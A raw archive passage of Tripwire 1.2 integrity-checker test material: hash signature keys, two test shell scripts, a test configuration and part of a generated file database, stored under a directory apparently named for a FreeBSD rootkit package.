2672275fe0c456fb671e4f417fb2f9892c7573ba sig8: haval : 3f85b9d3b459bc9955ca896c4dc6fb24 sig9: nullsig : 0 *** ./testfiles/t_file13 *** sig0: nullsig : 0 sig1: md5 : f447b20a7fcbf53a5d5be013ea0b15af sig2: snefru : 6cfb5e8f1da02bd167b01e4816686c30 sig3: crc32 : e11da79d sig4: crc16 : 4ca9 sig5: md4 : f1eaa22abcec04a5d3524f00b140d0c2 sig6: md2 : 9e899601601eb0af4d9e9fdf8771c187 sig7: sha : c4f9375f9834b4e7f0a528cc65c055702bf5f24a sig8: haval : b5bc9108d246c166adda8ebd2f73e002 sig9: nullsig : 0 *** ./testfiles/t_file14 *** sig0: nullsig : 0 sig1: md5 : 1b504d3328e16fdf281d1fb9516dd90b sig2: snefru : 29aa48325f275a8a7a01ba1543c54ba5 sig3: crc32 : c952ca62 sig4: crc16 : e91c sig5: md4 : 064984f462b38631d31624c411decfba sig6: md2 : eb95dea75b5c1c004ebd79751079a915 sig7: sha : e017693e4a04a59d0b0f400fe98177fe7ee13cf7 sig8: haval : a0997d012a4e7fafcbce108114809c21 sig9: nullsig : 0 *** ./testfiles/t_file15 *** sig0: nullsig : 0 sig1: md5 : b2cfa4183267af678ea06c7407d4d6d8 sig2: snefru : 6103721ccd8ad565d68e90b0f8906163 sig3: crc32 : a37c1a24 sig4: crc16 : d6fa sig5: md4 : 75afae0262592e6fd97990cda5a9be9a sig6: md2 : 33b61247dc9e2d0931633fdc3b181a88 sig7: sha : 179c94cf45c6e383baf52621687305204cef16f9 sig8: haval : fec312ff60147311bc6991b95484ee89 sig9: nullsig : 0 *** ./testfiles/t_file16 *** sig0: nullsig : 0 sig1: md5 : d50b9edee452966e27baf56d33d83a55 sig2: snefru : 56ab6bb21a7a07892d62cb03c41dde6d sig3: crc32 : 3c343c12 sig4: crc16 : 274b sig5: md4 : d543ef4c579e69601b07088ab7f2e17c sig6: md2 : 104cfc93647951d800bc0f7fc2f8efaa sig7: sha : 3eebeac5c732ee465299ef3212409133aa6378ab sig8: haval : ab66ef0b6a5306d306738be8ecbe0b4b sig9: nullsig : 0 *** ./testfiles/t_file2 *** sig0: nullsig : 0 sig1: md5 : 900150983cd24fb0d6963f7d28e17f72 sig2: snefru : 553d0648928299a0f22a275a02c83b10 sig3: crc32 : b755875d sig4: crc16 : 9738 sig5: md4 : a448017aaf21d8525fc10ae87aa6729d sig6: md2 : da853b0d3f88d99b30283a69e6ded6bb sig7: sha : a9993e364706816aba3e25717850c26c9cd0d89d sig8: haval : c79c31129c3fe87e506b46c6913c52ac sig9: nullsig : 0 *** ./testfiles/t_file3 *** sig0: nullsig : 0 sig1: md5 : f96b697d7cb7938d525a2f31aaf161d0 sig2: snefru : 96d6f2f4112c4baf29f653f1594e2d5d sig3: crc32 : 26cb4c69 sig4: crc16 : 3b44 sig5: md4 : d9130a8164549fe818874806e1c7014b sig6: md2 : ab4f496bfb2a530b219ff33031fe06b0 sig7: sha : c12252ceda8be8994d5fa0290a47231c1d16aae3 sig8: haval : 2c574b6b79528a852df8240995fe6a21 sig9: nullsig : 0 *** ./testfiles/t_file4 *** sig0: nullsig : 0 sig1: md5 : c3fcd3d76192e4007dfb496cca67e13b sig2: snefru : 7840148a66b91c219c36f127a0929606 sig3: crc32 : 5e46c857 sig4: crc16 : 9c1d sig5: md4 : d79e1c308aa5bbcdeea8ed63df412da9 sig6: md2 : 4e8ddff3650292ab5a4108c3aa47940b sig7: sha : 32d10c7b8cf96570ca04ce37f2a19d84240d3a89 sig8: haval : 92e8ec9ad7fd209d97e9ce21b50440e9 sig9: nullsig : 0 *** ./testfiles/t_file5 *** sig0: nullsig : 0 sig1: md5 : d174ab98d277d9f5a5611c2c9f419d9f sig2: snefru : 0efd7f93a549f023b79781090458923e sig3: crc32 : fb1e06c8 sig4: crc16 : 57b4 sig5: md4 : 043f8582f241db351ce627e153e7f0e4 sig6: md2 : da33def2a42df13975352846c30338cd sig7: sha : 761c457bf73b14d27e9e9265c46f4b4dda11f940 sig8: haval : 4ae2f37cef9275cce0d73f6a1eb9cdd8 sig9: nullsig : 0 *** ./testfiles/t_file6 *** sig0: nullsig : 0 sig1: md5 : 57edf4a22be3c955ac49da2e2107b67a sig2: snefru : d9204ed80bb8430c0b9c244fe485814a sig3: crc32 : 8c5f4c57 sig4: crc16 : 5ec7 sig5: md4 : e33b4ddc9c38f2199c3e7b164fcc0536 sig6: md2 : d5976f79d83d3a0dc9806c3c66f3efd8 sig7: sha : 50abf5706a150990a08b2c5ea40fa0e585554732 sig8: haval : fe866802ab5df3fa16cdc4547ad9578f sig9: nullsig : 0 *** ./testfiles/t_file7 *** sig0: nullsig : 0 sig1: md5 : 8215ef0796a20bcaaae116d3876c664a sig2: snefru : 96a885f1323c8a94c0413d06a8995eb2 sig3: crc32 : 682cd37b sig4: crc16 : 7d26 sig5: md4 : 4691a9ec81b1a6bd1ab8557240b245c5 sig6: md2 : 0dff6b398ad5a62ac8d97566b80c3a7f sig7: sha : 84983e441c3bd26ebaae4aa1f95129e5e54670f1 sig8: haval : 468c2898bdd3b5b6ca9e79cc4eba8c6c sig9: nullsig : 0 *** ./testfiles/t_file8 *** sig0: nullsig : 0 sig1: md5 : b026324c6904b2a9cb4b88d6d61c81d1 sig2: snefru : 44ec420ce99c1f62feb66c53c24ae453 sig3: crc32 : 047f1224 sig4: crc16 : 9795 sig5: md4 : 4d1dee0399f1614e6caf11111d3ce0ad sig6: md2 : 7126e6e44d6bde5b0c04e9a7c14672ea sig7: sha : e5fa44f2b31c1fb553b6021e7360d07d5d91ff5e sig8: haval : 6f35238887e9b7ed5eb6dd3e362b297f sig9: nullsig : 0 *** ./testfiles/t_file9 *** sig0: nullsig : 0 sig1: md5 : 2737b49252e2a4c0fe4c342e92b13285 sig2: snefru : 7182051aa852ef6fba4b6c9c9b79b317 sig3: crc32 : c3470bff sig4: crc16 : a8c4 sig5: md4 : ced1586eb330e55808617232685828ac sig6: md2 : d2c224507e8667ab345f4c734de5a444 sig7: sha : ad552e6dc057d1d825bf49df79d6b98eba846ebe sig8: haval : 915aa6753dd4a0907b93aadcc7891e6e sig9: nullsig : 0 fbsdrootkit-1.2/tripwire-1.2/tests/test0.sh100600 764 764 1305 5502473075 16041 0ustar dfdf#!/bin/sh # $Id: test0.sh,v 1.5 1993/12/12 01:39:09 genek Exp $ SIGGEN=$1 TESTDIR=$2 TEMPFILE=$3 TEST0KEY=$4 ME=$0 cat << GHK === $ME: DESCRIPTION This shell script exercises all the signature routines included in the Tripwire distribution. This suite is run on a series of files created by the authors of the signature routines. GHK echo "=== $ME: BEGIN ===" ./createfiles $TESTDIR rm -rf $TESTDIR/CVS $SIGGEN -h $TESTDIR/* > $TEMPFILE diff $TEMPFILE $TEST0KEY if [ $? -eq 0 ] then touch OKSIGS && rm $TEMPFILE echo "=== $ME: PASS ===" exit 0 else echo Signatures do not match! File $TEMPFILE should match $TEST0KEY. Aborting... echo "=== $ME: FAIL ===" exit 1 fi fbsdrootkit-1.2/tripwire-1.2/tests/test1.sh100600 764 764 3127 5503641561 16044 0ustar dfdf#!/bin/sh # $Id: test1.sh,v 1.12 1993/12/15 17:03:45 genek Exp $ HOSTNAME=hostname # check to see if we ran from top-level makefile! if [ $# -ne 2 ] then echo "Sorry! You must run this test from the top-level Makefile!" exit 1 fi HOSTNAME=$1 DIST=$2 ME=$0 cat << GHK === $ME: DESCRIPTION This shell script tests all the Tripwire signature routines. Consequently, this test may take awhile to complete, because even the slowest signature routines are exercised. On a Sequent Symmetry running 16 Mhz Intel 80386s, this test takes over five minutes to complete. This same test using only the MD5 routines completes in less than 30 seconds. This test suite will ascertain whether the byte-ordering and machine-dependent routines are working correctly. GHK echo "=== $ME: BEGIN ===" echo '' echo creating: ./tw.db_TEST.@ echo creating: ./@tw.config HOST=`$HOSTNAME` CURRPATH=`pwd` CURRPATH=`echo $CURRPATH | sed s,/tests$,,` sed s,/tmp/genek/$DIST,$CURRPATH, < ./tw.db_TEST > ./tw.db_TEST.@; sed s,/tmp/genek/$DIST,$CURRPATH, < ./tw.conf.test > ./@tw.config; ../src/tripwire -loosedir -c ./@tw.config -d ./tw.db_TEST.@; echo "=== $ME: END ===" echo '' echo Tripwire should have only reported: echo " added: $CURRPATH/tests/@tw.config" echo " $CURRPATH/tests/tw.db_TEST.@... " echo " $CURRPATH/tests/OKEXER... " echo " changed: $CURRPATH/... (maybe some directory sizes...) " echo " ...and any other files you may have changed!" echo '' echo '' echo removing: ./tests/tw.db_TEST.@ echo removing: @tw.config rm ./tw.db_TEST.@ rm ./@tw.config fbsdrootkit-1.2/tripwire-1.2/tests/tw.conf.test100600 764 764 3756 5614763367 16753 0ustar dfdf/tmp/genek/tripwire-1.2 R+0123456789-ugpmci /tmp/genek/tripwire-1.2/tests E !/tmp/genek/tripwire-1.2/databases E !/tmp/genek/tripwire-1.2/tests/databases E !/tmp/genek/tripwire-1.2/src/config.parse.o !/tmp/genek/tripwire-1.2/src/main.o !/tmp/genek/tripwire-1.2/src/list.o !/tmp/genek/tripwire-1.2/src/ignorevec.o !/tmp/genek/tripwire-1.2/src/dbase.build.o !/tmp/genek/tripwire-1.2/src/utils.o !/tmp/genek/tripwire-1.2/src/preen.o !/tmp/genek/tripwire-1.2/src/preen.interp.o !/tmp/genek/tripwire-1.2/src/preen.report.o !/tmp/genek/tripwire-1.2/src/nullsig.o !/tmp/genek/tripwire-1.2/src/config.prim.o !/tmp/genek/tripwire-1.2/src/dbase.update.o !/tmp/genek/tripwire-1.2/src/sigfetch !/tmp/genek/tripwire-1.2/src/siggen !/tmp/genek/tripwire-1.2/src/tripwire !/tmp/genek/tripwire-1.2/src/twconvert !/tmp/genek/tripwire-1.2/src/twconvert.o !/tmp/genek/tripwire-1.2/src/siggen.o !/tmp/genek/tripwire-1.2/src/config.pre.o !/tmp/genek/tripwire-1.2/sigs/crc/crc.o !/tmp/genek/tripwire-1.2/sigs/crc32/crc32.o !/tmp/genek/tripwire-1.2/sigs/md2/md2wrapper.o !/tmp/genek/tripwire-1.2/sigs/md2/md2.o !/tmp/genek/tripwire-1.2/sigs/md4/md4.o !/tmp/genek/tripwire-1.2/sigs/md4/md4wrapper.o !/tmp/genek/tripwire-1.2/sigs/md5/md5.o !/tmp/genek/tripwire-1.2/sigs/md5/md5wrapper.o !/tmp/genek/tripwire-1.2/sigs/snefru/snefru.o !/tmp/genek/tripwire-1.2/sigs/sha/sha.o !/tmp/genek/tripwire-1.2/sigs/sha/shawrapper.o !/tmp/genek/tripwire-1.2/sigs/haval/haval.o !/tmp/genek/tripwire-1.2/sigs/haval/havalwrapper.o !/tmp/genek/tripwire-1.2/aux/types !/tmp/genek/tripwire-1.2/aux/byteorder !/tmp/genek/tripwire-1.2/tests/createfiles !/tmp/genek/tripwire-1.2/tests/testfiles !/tmp/genek/tripwire-1.2/tests/OKSIGS !/tmp/genek/tripwire-1.2/src/config.lex.c !/tmp/genek/tripwire-1.2/src/config.pre.c !/tmp/genek/tripwire-1.2/Makefile #/tmp/genek/tripwire-1.2/include/config.h # for show !/tmp/genek/tripwire-1.2/include/byteorder.h !/tmp/genek/tripwire-1.2/include/inode.h !/tmp/genek/tripwire-1.2/src/help.o !/tmp/genek/tripwire-1.2/src/help.c fbsdrootkit-1.2/tripwire-1.2/tests/tw.db_TEST100600 764 764 122020 5630551450 16300 0ustar dfdf# Generated by Tripwire, version 1.2 on Tue Aug 30 01:14:46 1994 @@dbaseversion 4 /tmp/genek/tripwire-1.2 0 00007R 40740 23915 13 856 856 512 0kOivL 0kOiuM 0kOivG 0 0 0 0 0 0 0 0 0 0 /tmp/genek/tripwire-1.2/aux 0 00007R 40740 8 2 856 856 512 0kOivL 0kOiuM 0kOiut 0 0 0 0 0 0 0 0 0 0 /tmp/genek/tripwire-1.2/aux/Makefile 0 00007R 100600 43 1 856 856 611 0kOiur 0j3q0u 0kOiur 0 3O5zlRM7cIukKAaSLVZ6Tu 0yq2FWYd:hyjk58V4b5FS7 1CI.tL 000Ai6 3I:dAIaauiuOj7n2.O52.n 0oknp6PHeOOzoADMPo.gA8 FNPbNXIMgUVekJftN8PlRrJnD0Z 2::z.ZgM1KBb46kBR2X.t5 0 /tmp/genek/tripwire-1.2/aux/byteorder.c 0 00007R 100600 50 1 856 856 1074 0kOiur 0k9cpC 0kOiur 0 3dBsRrvMcDM19UIpUY2C4c 2nVoerWItO1Wy2HD9:oixB 0YcAMB 000AUR 3sxZUei8.qlc0Jdlfg60zZ 3xbLr5MA7z7H8PoF042O9L DuYAbrkpr5Fcul4.CPwMGyY47Si 1vMj5ECko4mr2W0Ow0WtiN 0 /tmp/genek/tripwire-1.2/aux/ntohl.h 0 00007R 100600 55 1 856 856 989 0kOiur 0k9cpD 0kOiur 0 0JWQBZaRUN7UMGy3Ayma69 00dtyGTpBDOe5L0lk:HfBv 0os4tB 000Dq4 1htB5qeYG1JoBPPNgDEIoG 0IQuIYFyr.1497y9eCkZa: EkNxkQV5agy11heuxlCjxeDiCEj 249Q.BOTFRk211aVhA6OpK 0 /tmp/genek/tripwire-1.2/aux/twconvert.c 0 00007R 100640 56 1 856 856 2498 0kOiur 0j2:bJ 0kOiur 0 2TTWKZyw2JIzZYlDP8Q3PK 1zUoFWQuKhVTVQX6ProrL: 3sWrFO 000D5P 1NjPt32bhVm0wHdanuiGNe 2x7Hd1LSXZ5yTDun5yIjCh 4FzMCU3xUQ8DNS6RK:iN9.EcP7f 1oFCmWmUxDVgxeAxf96dDj 0 /tmp/genek/tripwire-1.2/aux/types.c 0 00007R 100600 57 1 856 856 1542 0kOiur 0j2:bJ 0kOiur 0 0F3J:OGvd05U.4EXVBIT1V 2tBhK2:Rvmn8LZej4.hake 2eo3sh 0008BY 0UKtU9SlXVBCCndxBUTCOB 2PVn0sZakvB:nLUdjF7636 B1ynSSa9WB6QnqBp8iLP8i2AdcO 2Xvt8Hoq0A1xvb2qwxEubd 0 /tmp/genek/tripwire-1.2/aux/types.sh 0 00007R 100700 58 1 856 856 1209 0kOius 0jQRWI 0kOius 0 2q5InhdUDGl:D0IGigZ7J6 1:lzT3on5hiLEzcG3TVNW9 3GRGTt 000546 1yOWszmlbvPElE:yNYu6tW 0523AbYOI1BwhtYTNobxjD 8mnYWRAnx8P0txBJFrERMAeSOkq 23uQxLE3ySBRueDD8zPsB: 0 /tmp/genek/tripwire-1.2/COAST.info 0 00007R 100600 23916 1 856 856 2201 0kOius 0kOiqa 0kOius 0 1lf8wSvezLzQUgAztOx:pR 2E31jxi7zt0UX3VWyFEecZ 2PRM31 000FgZ 2WWQkugLNBHj8Bur21c1rY 3RfKbfNePfmfQCIiXih1UR ApavO1CHx9yWEpVYTU0O1zhJcJj 0QSSQcjcmm6ow9ZpeoEC7m 0 /tmp/genek/tripwire-1.2/Changelog 0 00007R 100600 23917 1 856 856 21955 0kOius 0kOiqg 0kOius 0 1IkrqQJg6FOHkZHDGdTzld 1FPEAY6GH6F9fqQKaCxYdo 2P1vFv 0002va 2gIOWOgy7QfGFW8a5wttkI 2d:meWM1HucdYop197Pmg. 5PEm:zFtJp6koX0wBJr7v.gddKx 1me6k0W.J2QCI:bfSGiEcq 0 /tmp/genek/tripwire-1.2/FAQ 0 00007R 100600 23918 1 856 856 4972 0kOius 0kOiqi 0kOius 0 37oCNF074A5kfTmAYHpFRP 2Tc1dw4JTPcqLrPMKVLNt. 03lnK8 000FiM 0fwuJ8a5C5U3VmCwmIXhCK 3P3A49JgEWYJ:0FKQ:fcHZ 9nIWx4ei9DX6k1tKsOR9LVvq9V1 2pa12tJ6G:vyu6uWzJolB3 0 /tmp/genek/tripwire-1.2/INTERNALS 0 00007R 100640 23919 1 856 856 1527 0kOius 0k9d8S 0kOius 0 3wXRa7Isaz9lphjSqizDMI 2CmDJGEiFc6N6CUXcbFwKt 0Gi7Om 000EbL 2KHEojnXumtHB08ohrriaA 0XclhK6fTeZ2DW0oBL4GUA 63a8gSfHtGbOLXMRGeUInvtbu5W 0C6h.yW5jdB5WwkD2wTybJ 0 /tmp/genek/tripwire-1.2/Ported 0 00007R 100600 23921 1 856 856 11406 0kOius 0kG6G5 0kOius 0 2KT.ha89wKxjqhSRwVNAui 0fwYdkS8IrdOR4Ojb3aUlJ 1e9Xmo 000Exr 1h9eJXjNjBkT2uoPnFHxLN 3X:WYzZLh5ya3KNHoxn4IH COE3thzK.GjqBsKK42fxZcEzw6V 0SR0YojeT.EDDgxOUKDjKP 0 /tmp/genek/tripwire-1.2/README 0 00007R 100600 23922 1 856 856 38531 0kOius 0kNQPO 0kOius 0 0mznj8v9cqu7vnUxtW6JFA 2Y9Gc9S2wxqSDTu3v9yOpH 3Lo0ut 000F:Y 2vo6smNinbvcMx7b406qMk 1U8i6cSpM8xnh9hUC7vobg 1zruqOlZVXSHD628ZR11NcFfWUd 2y20P8vjzEx7zinuXijS5s 0 /tmp/genek/tripwire-1.2/README.FIRST 0 00007R 100640 23923 1 856 856 1262 0kOius 0kOiqj 0kOius 0 36pYby7KUfZZ:iRq0empQf 2ztN8:up0u2MNLM:3zQSsQ 2yvSMt 000FNL 0DCaIElD2LSr6Rqj6vsZI5 2uyQ:0O4mU1U6DyqQ1c1pR 6bA5y:BMTBTsFYg:LQsdfLpDk9B 3mw1Qks1O8vf8h3Ru87cHf 0 /tmp/genek/tripwire-1.2/TODO 0 00007R 100600 23924 1 856 856 2610 0kOiut 0kA8q6 0kOiut 0 1A16JteinCfbeyx6goApO7 0:Z.tQcZPSeh:8:lrHMpVw 39Z0R. 000Dp6 3Nc8QOlMamre3s64lZhf9f 3lpYh0A5C0LS5gecJcq6JN AfJM.1m9JVxPrZ5fLWlEQMDVJld 1FZjMQmMuZcSVzFjGtVlal 0 /tmp/genek/tripwire-1.2/WHATSNEW 0 00007R 100640 23925 1 856 856 14340 0kOiut 0kOiqk 0kOiut 0 0P8dLYBouWUvxGOjO3cFSN 0aHfuVzZUAqa8cjXKeHWxI 0UhH5J 00058x 1kYqLY0CZfqJN2tn:1PcPy 3esEZJjqEU5h91UzYZgIT: 5SgGofUPuwVTR:iNE8x4g04RUwf 2YEMNhw:VRQ5:tB02K3jF: 0 /tmp/genek/tripwire-1.2/configs 0 00007R 40740 25383 2 856 856 1536 0kOivL 0kOiuN 0kOiu. 0 0 0 0 0 0 0 0 0 0 /tmp/genek/tripwire-1.2/configs/Makefile.xenix 0 00007R 100600 25388 1 856 856 5276 0kOiut 0iSmyN 0kOiut 0 2Qj4d5epUV5OKtvDvc.bXv 2qkyPjQ62dO9QSGL5Thmvj 2s77O3 000BWn 2NtugojWtpVWUhsS9tpnEX 3JQvhW8Zj6W0Pf66zZLqvB DN4OLbpgn2nXCXT8jCI4BxXhcAu 0wHf7UiZ37WP53EZq6UCL1 0 /tmp/genek/tripwire-1.2/configs/conf-3b2g.h 0 00007R 100600 25390 1 856 856 1116 0kOiut 0iSmyO 0kOiut 0 3XCk2MZPegr8iG1YI5YRgv 0QmQYCPVrvjLJoH5cuJ1ui 0Ukhfm 0001XM 17cVEkyYEiyw9d4laTPNdr 11iosZ7VqfVs:3H9ez466e CMgo9oyWMG2ojReINnUjzPuJsrC 3TwWk8JRwNMICRdyf:t9zq 0 /tmp/genek/tripwire-1.2/configs/conf-3b2gr.h 0 00007R 100600 25391 1 856 856 976 0kOiut 0iSmyP 0kOiut 0 3WKSk2zlyFOr.o9gwpDtos 2XtarjzpoY4UCu0moqv9W4 31SMxr 000AOA 0Vj6k.VctvuiQ.JVzj5O5W 1qbSxhxjWPapsv7:18tjEx 7bXZvd4J8pkSg.Qb.UpUg4F1KOE 2DVmGHymmMihPxqJxUFrBN 0 /tmp/genek/tripwire-1.2/configs/conf-aix.h 0 00007R 100600 25392 1 856 856 983 0kOiut 0iSmyQ 0kOiut 0 0CvjO6sY6.oYRUSCoDX:po 1IUXSvDHpqzfiJK7uPNWEM 0JYuOu 000Bc3 0IImCYxDxYrtqJEHB0ZzOA 2S8Ele40glroZJUp6G2JhD E0QBx6OUSntEYptTQtQSr1M5VB1 21gL:xMilH.kY5lHGUsQxl 0 /tmp/genek/tripwire-1.2/configs/conf-apollo.h 0 00007R 100640 25393 1 856 856 1113 0kOiut 0jQRWL 0kOiut 0 1XkmTJgRHtmNkmfsP3luha 0ZCpnsDff24QD4dQllbeZC 2jOD9a 000B.j 1zUK8Emnqy0yIPMjjg8ivC 0JNbL1cwhKnelzdQIRvSsv 7genmLmeknRaSvFtTZDX6QuwgVx 1MAbFwBItUVIMWRrp9u1kg 0 /tmp/genek/tripwire-1.2/configs/conf-aux3.h 0 00007R 100600 25394 1 856 856 1012 0kOiut 0iSmyR 0kOiut 0 289vm8UbTVEXN71uduwNwj 17Kq.wQhnRnbHDdAfhlsrv 1OTwB: 000Fqt 1YuV9RVzxEDEf6z.034e:6 1xMKNcE7VMtPmDyozX8RWQ DHcofGW3VFvUXfopoPCnKX4nWAC 1BT74LMPegFNk:jpmoWD5W 0 /tmp/genek/tripwire-1.2/configs/conf-bsd.h 0 00007R 100600 25396 1 856 856 867 0kOiuu 0iSmyS 0kOiuu 0 0Vr:GIRQbbzzqpHdFdk83q 1AyJpbfpoJYbOO5hTiitiY 2lChiv 000BeT 1VR4situOKcmXpjiIpwDFV 3y1qwNNkWUMUbX96bIpm5m 4b2kEnsXe1x4WAOzEvIUANAsn0k 3w5VD7msq:v0wJxRfvPzNu 0 /tmp/genek/tripwire-1.2/configs/conf-bsdi.h 0 00007R 100600 25397 1 856 856 927 0kOiuu 0kG6GC 0kOiuu 0 3auV:gC2G1tIaUnhMIfwuB 3aKB08RwpOPCpVN5eja8j. 0nyQTZ 00016O 1qX.xF.KMDyEe22Jb679hr 1tu7i8N3rniQgTgoQ022dV 1dNKKc3caw.fpqA.2hu2aeYNLn5 2r8tAVDXUncPSV1.wxDavE 0 /tmp/genek/tripwire-1.2/configs/conf-convex.h 0 00007R 100600 25398 1 856 856 959 0kOiuu 0iSmyT 0kOiuu 0 17Pl9GseszGTIr39hGZ:7c 1tD9a8HhoM2T6MZNhAhu94 3MCbdC 0007pp 1HgXSYhXm81NfplNe:QgFy 21M7u3I5yyHS5aRvL4Ker: CmOjlN6mU2ZZlsG7vP8sCl681yR 1XnuF:SqSmASzlpjjQBy4w 0 /tmp/genek/tripwire-1.2/configs/conf-dynix.h 0 00007R 100600 25399 1 856 856 871 0kOiuu 0iSmyU 0kOiuu 0 1RsSW:qh649ETvtGWBUUu6 2rw2tQBhmH3Q2VOJ.j1mrE 09XEx: 0000n0 3ox1vsBt5RqHi8U7ttspyx 3zW9g4R5bQzc:eWlVQdN69 1xzK7riWrteGJaCSaL4Nr6WZdUE 2IO1PmHYiYlmOfAcDK3wBt 0 /tmp/genek/tripwire-1.2/configs/conf-epix.h 0 00007R 100600 25400 1 856 856 842 0kOiuu 0iSmyV 0kOiuu 0 1VIoE2OODD.dOFw4ac.ukX 1rbhJCqJHUD9JiYi5sPzpg 3E7ce5 0002dM 0YGBjjaPNwP3S3mhpn0Uhm 1i0N:kP52io1cmuJk.RH90 9hTRrKXO6WUV.fJoZBaUfEyJ3Zh 1VfcvMPuHmwFmL4iCxxoY8 0 /tmp/genek/tripwire-1.2/configs/conf-hpux.h 0 00007R 100600 25401 1 856 856 1255 0kOiuu 0kA6:v 0kOiuu 0 3msF:::zpEV9FMwjrsIHSE 2lr9YTPMgNEZMOnvS1epWj 08Lv4X 000EeZ 2vEtkrSMUCvlx689bAm1yX 1z7XOATUKXYoQRRfhWNGgX AE7NsHmnR1Q.1qAM.XPUKTIJ.E1 2nh:J3cxK:FwDuECnOO:Ot 0 /tmp/genek/tripwire-1.2/configs/conf-irix4.h 0 00007R 100600 25402 1 856 856 949 0kOiuu 0iSmyX 0kOiuu 0 0WzvWmECfMz2nO7IRGFEYv 3XhWMWvukLMe:ZFxvIneOq 1y8enP 000B9A 32ip4AjRO9DMjxqHq3r0h4 3WgSD.2rOwSqoYOSppFsKS 5F8UHT3WHBtsg2vCWcCyyeBqyrM 3X3Msmq4FteVawjltJRYdx 0 /tmp/genek/tripwire-1.2/configs/conf-linux.h 0 00007R 100600 25403 1 856 856 888 0kOiuu 0kBmzs 0kOiuu 0 0quXVAfkkleBxPFjqPm5Au 0DYTBlIb7mj33AMZCJUvyT 2aGizl 0008h8 2lXyPKAE:jD4064Kcquwj4 2LVDQD:ZpQyyxtJZvhzhgl ESbrYjrWYJYqXBkT1sRpXfZA5m5 3ca0FYt1RSB4T8Yi83mAM. 0 /tmp/genek/tripwire-1.2/configs/conf-mach.h 0 00007R 100600 25404 1 856 856 1117 0kOiuu 0iSmyY 0kOiuu 0 17FIel8nxOdg7YppwE57yO 3ar0F3v6n3l4OSazKK0rpI 2p0QLN 0002fT 2WbAo3Yg2FFjoxyF6kBND1 12CvCrmgtSOPHUgm7qinUx 8UKkJeI7nltMeCVial24GV0pnUe 0tLYhr2f55soU8wXipGsow 0 /tmp/genek/tripwire-1.2/configs/conf-motoR3.h 0 00007R 100600 25405 1 856 856 1178 0kOiuu 0k9cpI 0kOiuu 0 3YtaeCqu0aP4EGLjQV8KF6 1RX2bpmdPGiRGrkyKXZD9: 0NlEUi 000FES 0IS3YEyKAq.GMrFqucozdD 0.n8T1Zif2a61oxviK2ULe 3g5bPhZSRZOxAs3ANRDuLnYZTVe 3UJIuhJZ8Q3GHMPJQWNIAl 0 /tmp/genek/tripwire-1.2/configs/conf-motoR32.h 0 00007R 100600 25406 1 856 856 993 0kOiuu 0k9cpJ 0kOiuu 0 2WdC:BCl:nVIQCeWQ9Lp3H 3WSukojkpZdUut:nUOhSR9 1SB:C0 0007k1 3lsAcrUH9GY5c3Y::Mb.VZ 2zvnlRzGKlEA5GcV:YQTWH ETy27tQ775cVgbykFQR6nD4z05D 2:VegMQgE.v6YHDuz:f4Um 0 /tmp/genek/tripwire-1.2/configs/conf-motoR4.h 0 00007R 100600 25407 1 856 856 875 0kOiuu 0k9cpK 0kOiuu 0 2f7JS.Yc5E0IhlMdqzeYvr 1.scpOaWyIHZTilRqq8Ybk 0DQrPx 0009:T 05CkPu6EGU.KndcVxO4Vl2 3rsdpgpLG5xWZ.YSKgXrJ. 0E4XT2jMNJBjijCnTaZY023R0JN 2Joi8kF2chqiLu98.gwXjX 0 /tmp/genek/tripwire-1.2/configs/conf-odt2.h 0 00007R 100600 25408 1 856 856 937 0kOiux 0k9cpL 0kOiux 0 09oQ4a.GkVrQS:2hR:z9JH 1dCsFKVm95.30vqIufCeF3 1LtBxY 000Bbu 0QtIB.eDo7wYTPu1ZFwC8p 2a:m1eWUDbyVcFnuRbpdk2 2jRsk:QhWqqfpuMMzloTEC6DJ7m 3jn.9kpakLQbxOWahaoefx 0 /tmp/genek/tripwire-1.2/configs/conf-osf1.h 0 00007R 100600 25409 1 856 856 919 0kOiux 0k9cpN 0kOiux 0 3l9eP13oeSmCSNyJ.zo3YA 0Xozuj6fWEi47laiT0V::F 2VG:Mw 000DVY 1a8t13t.dQ1ebf9aYM95:Y 26DR050fIw5gkTY6O3vMPK BMEOWyrxrJy1gePjJQzPoFZ4Bc3 2X..VDMIKWWL7wMIUBj4W3 0 /tmp/genek/tripwire-1.2/configs/conf-osx-att.h 0 00007R 100600 25410 1 856 856 753 0kOiux 0iSmya 0kOiux 0 3rHECjwTV:pjXP3jDpTStf 2xs9uexv5H7BhJwvgemtys 3HzyQq 0008iO 39qOWEFsBWWiaesN.K5x:5 1RJMsgrDGGl:Ms3PB1ZS6g FvWs5HhLHgiaKLx3xJqYy7UNiKS 3ObYLpdepmIes7FrubFLGL 0 /tmp/genek/tripwire-1.2/configs/conf-osx-ucb.h 0 00007R 100600 25411 1 856 856 804 0kOiux 0iSmyc 0kOiux 0 2QWH6Ku2f9ACzLcaLLdxcH 0.jtiemVGvJs9fsjg3DSj4 0YX9mK 00068w 2Eo53z1GQE:kRDMFRsGhxc 0yCLr11o:XWLnsgH4xunYL 8r6Y:KdSQJ:Rn1gfsGkBSVYu.Fu 1YnFmZoVlacZnvWOXaL0WZ 0 /tmp/genek/tripwire-1.2/configs/conf-ptx2.h 0 00007R 100600 25412 1 856 856 2419 0kOiuy 0iy5v8 0kOiuy 0 3uAfhUO1RrKsSXEckddiML 1.eaxCroyzV0A:KqvB5ejP 03FxGH 000AqJ 1jAHPFXwT7kLzitLE:GJcC 2xQDhZLCb3:9om81g0fZpR 4d71Riqk9GjvCna5.ZpCZA0EpEc 002hvFC9.KWEk2G55oFhwR 0 /tmp/genek/tripwire-1.2/configs/conf-riscos.h 0 00007R 100600 25413 1 856 856 958 0kOiuy 0iSmyd 0kOiuy 0 2BF85vZuIvatY.EX3zSNFK 1LJhgziqKFxukRm2ccVizX 30aE9p 0000bw 0eeKmXJp70RYE5vJ4dzuLf 3ffPabKUc0Le0LhvbbKSdw EKNA9RArLVW2MIqD2V4J1Jz1QW. 2QsKduuImp7eBcSrrv41J1 0 /tmp/genek/tripwire-1.2/configs/conf-sco.h 0 00007R 100640 25414 1 856 856 954 0kOiuy 0jQRWM 0kOiuy 0 1VXe06iJRLZNiG:iQjnNMN 1ac9qYGyATsUJzpGfkM2Ll 2WZss2 0001mp 3ao09R7eOWYtLqoPW6:RZW 2GoL767857:Pf71VIkKyiP 55EQkL5DwM57:.28DRN4VRz:lLk 0:LtNUuNwEMts3cDsI3bOs 0 /tmp/genek/tripwire-1.2/configs/conf-sco2.h 0 00007R 100640 25415 1 856 856 976 0kOiuy 0k9cpO 0kOiuy 0 2o0maLMP7zcZj1yCa0Pejp 165FPmLP8fEwD.GTcxBkuF 2Pty4P 0005mc 2F2gdoPLn62SMpMMo8WV4C 2NgrhuTwAYixSZLj30ys:8 